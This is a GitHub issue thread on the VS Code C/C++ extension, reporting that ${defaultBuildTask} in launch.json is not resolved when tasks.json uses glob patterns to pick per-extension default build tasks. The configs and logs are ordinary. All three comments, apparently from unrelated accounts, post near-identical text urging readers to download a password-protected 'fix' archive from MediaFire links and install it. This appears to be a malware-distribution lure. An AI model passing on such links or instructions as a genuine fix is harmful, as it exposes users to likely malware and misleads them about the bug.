### ISSUE TITLE
${defaultBuildTask} is not determined when using glob pattern for default task 

### ISSUE THREAD

**Issue by github-day** [microsoft/vscode-cpptools#12638]
### Environment

- OS and version: Windows_NT x64 10.0.22631
- VS Code: 1.92.2
- C/C++ extension: ms-vscode.cpptools v1.21.6
- OS and version of remote machine (if applicable): Linux 5.15.153.1-microsoft-standard-WSL2 #1 SMP Fri Mar 29 23:14:13 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
- GDB / LLDB version: GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1

### Bug Summary and Steps to Reproduce

there are source files *.c, *.cpp
now i want to compile them using with gcc/g++ respectively and i have figured out that according to https://code.visualstudio.com/updates/v1_68#_tasks
vscode is able to choose different tasks as default task based on different extend name.
and i think the default task should be the value of variable ${defaultBuildTask} in launch.json but not really
whether there is an convenient way to let launch.json pick the proper task?

Steps to Reproduce:
1.  open a new workspace
2.  create main1.c and main2.cpp
3.  modify .vscode/launch.json and .vscode/tasks.json as following
4.  now press ctrl+shift+B, the corresponding file will be compiled
5.  but if click the button upper-right 
![image](https://github.com/user-attachments/assets/d0fc2dc7-75fc-4021-beaa-d79c3e9629a7)
vscode asks me to choose the default build task and configuration files.

### Debugger Configurations

```shell
./.vscode/tasks.json
{
    "tasks": [
        {
            "type": "cppbuild",
            "label": "C/C++: gcc build active file",
            "command": "/usr/bin/gcc",
            "args": [
                "-fdiagnostics-color=always",
                "-g",
                "${file}",
                "-o",
                "${fileDirname}/a.out"
            ],
            "options": {
                "cwd": "${fileDirname}"
            },
            "problemMatcher": [
                "$gcc"
            ],
            "group": {
                "kind": "build",
                "isDefault": "**.c"
            },
            "detail": "Task generated by Debugger."
        },
        {
            "type": "cppbuild",
            "label": "C/C++: g++ build active file",
            "command": "/usr/bin/g++",
            "args": [
                "-fdiagnostics-color=always",
                "-g",
                "${file}",
                "-o",
                "${fileDirname}/a.out"
            ],
            "options": {
                "cwd": "${fileDirname}"
            },
            "problemMatcher": [
                "$gcc"
            ],
            "group": {
                "kind": "build",
                "isDefault": "**.cpp"
            },
            "detail": "Task generated by Debugger."
        }
    ],
    "version": "2.0.0"
}

in ./.vscode/launch.json
{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "(gdb) Launch",
            "type": "cppdbg",
            "request": "launch",
            "preLaunchTask": "${defaultBuildTask}",
            "program": "${fileDirname}/a.out",
            "args": ["<","data.in"],
            "stopAtEntry": false,
            "cwd": "${fileDirname}",
            "environment": [],
            "externalConsole": false,
            "MIMode": "gdb",
            "setupCommands": [
                {
                    "description": "Enable pretty-printing for gdb",
                    "text": "-enable-pretty-printing",
                    "ignoreFailures": true
                },
                {
                    "description": "Set Disassembly Flavor to Intel",
                    "text": "-gdb-set disassembly-flavor intel",
                    "ignoreFailures": true
                }
            ]
        }
    ]
}
```

### Debugger Logs

```shell
Activating task providers undefined
Activating task providers cppbuild
Activating task providers undefined
Activating task providers undefined
Activating task providers undefined
Activating task providers undefined
```

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
